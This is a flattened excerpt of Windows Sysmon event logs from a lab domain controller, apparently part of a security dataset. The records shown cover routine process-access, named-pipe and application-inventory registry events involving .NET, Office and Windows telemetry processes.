14:58:02.889{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-020E-00000000BB01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.873{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.873{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 13241300x800000000000000077621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.842{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\BinProductVersion18.151.729.13 13241300x800000000000000077620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.842{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\LinkDate09/17/2018 17:44:14 13241300x800000000000000077619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.842{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\Publishermicrosoft corporation 13241300x800000000000000077618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.842{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\LowerCaseLongPathc:\program files\microsoft office\root\integration\addons\onedrivesetup.exe 13241300x800000000000000077617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.842{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\BinProductVersion16.0.13127.21210 13241300x800000000000000077616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.842{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\LinkDate02/05/2021 12:50:14 13241300x800000000000000077615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.842{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\Publishermicrosoft corporation 13241300x800000000000000077614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.842{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\LowerCaseLongPathc:\program files\microsoft office\root\integration\integrator.exe 13241300x800000000000000077613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.842{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplication\0000354e1e7b0cf8fcbef7446d5e3157aaa400000000\PublisherMicrosoft Corporation 18141800x800000000000000077612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 13241300x800000000000000077611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.811{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplication\00001ce300114cd699a5ec1dc952222e119100000904\PublisherMicrosoft Corporation 13241300x800000000000000077610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.811{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplication\0000354e1e7b0cf8fcbef7446d5e3157aaa400000000\PublisherMicrosoft Corporation 18141800x800000000000000077609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.795{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-010E-00000000BB01}4048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.779{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.779{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000077603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\xlicons.exe|f1f83fd61f5a2af1\BinProductVersion16.0.13127.21336 13241300x800000000000000077602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\xlicons.exe|f1f83fd61f5a2af1\LinkDate03/04/2021 07:50:43 13241300x800000000000000077601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\xlicons.exe|f1f83fd61f5a2af1\Publishermicrosoft corporation 13241300x800000000000000077600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\xlicons.exe|f1f83fd61f5a2af1\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\xlicons.exe 13241300x800000000000000077599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\xlicons.exe|7d12eeff2e863364\BinProductVersion16.0.11629.20024 13241300x800000000000000077598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\xlicons.exe|7d12eeff2e863364\LinkDate05/03/2019 09:17:52 13241300x800000000000000077597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\xlicons.exe|7d12eeff2e863364\Publishermicrosoft corporation 13241300x800000000000000077596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\xlicons.exe|7d12eeff2e863364\LowerCaseLongPathc:\program files\microsoft office\root\office16\xlicons.exe 13241300x800000000000000077595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordicon.exe|78223a0fd1214c54\BinProductVersion16.0.11629.20024 13241300x800000000000000077594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordicon.exe|78223a0fd1214c54\LinkDate05/03/2019 09:17:50 13241300x800000000000000077593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordicon.exe|78223a0fd1214c54\Publishermicrosoft corporation 13241300x800000000000000077592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordicon.exe|78223a0fd1214c54\LowerCaseLongPathc:\program files\microsoft office\root\office16\wordicon.exe 13241300x800000000000000077591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordicon.exe|444cd0949335bdb3\BinProductVersion16.0.13127.21336 13241300x800000000000000077590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordicon.exe|444cd0949335bdb3\LinkDate03/04/2021 07:51:08 13241300x800000000000000077589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordicon.exe|444cd0949335bdb3\Publishermicrosoft corporation 13241300x800000000000000077588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordicon.exe|444cd0949335bdb3\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\wordicon.exe 13241300x800000000000000077587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordconv.exe|21b337580489bd1\BinProductVersion16.0.13127.21348 13241300x800000000000000077586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordconv.exe|21b337580489bd1\LinkDate03/06/2021 23:43:43 13241300x800000000000000077585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordconv.exe|21b337580489bd1\Publishermicrosoft corporation 13241300x800000000000000077584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\wordconv.exe|21b337580489bd1\LowerCaseLongPathc:\program files\microsoft office\root\office16\wordconv.exe 13241300x800000000000000077583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\winword.exe|13fbee5927c46013\BinProductVersion16.0.13127.21348 13241300x800000000000000077582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\winword.exe|13fbee5927c46013\LinkDate03/06/2021 23:36:45 13241300x800000000000000077581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\winword.exe|13fbee5927c46013\Publishermicrosoft corporation 13241300x800000000000000077580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\winword.exe|13fbee5927c46013\LowerCaseLongPathc:\program files\microsoft office\root\office16\winword.exe 13241300x800000000000000077579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\vpreview.exe|a4f4b801e1787737\BinProductVersion16.0.13127.21348 13241300x800000000000000077578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\vpreview.exe|a4f4b801e1787737\LinkDate03/06/2021 23:39:14 13241300x800000000000000077577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\vpreview.exe|a4f4b801e1787737\Publishermicrosoft corporation 13241300x800000000000000077576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\vpreview.exe|a4f4b801e1787737\LowerCaseLongPathc:\program files\microsoft office\root\office16\vpreview.exe 13241300x800000000000000077575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\visicon.exe|298c64a15915f13a\BinProductVersion16.0.13127.21336 13241300x800000000000000077574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\visicon.exe|298c64a15915f13a\LinkDate03/04/2021 07:47:49 13241300x800000000000000077573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.748{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\visicon.exe|298c64a15915f13a\Publishermicrosoft corporation 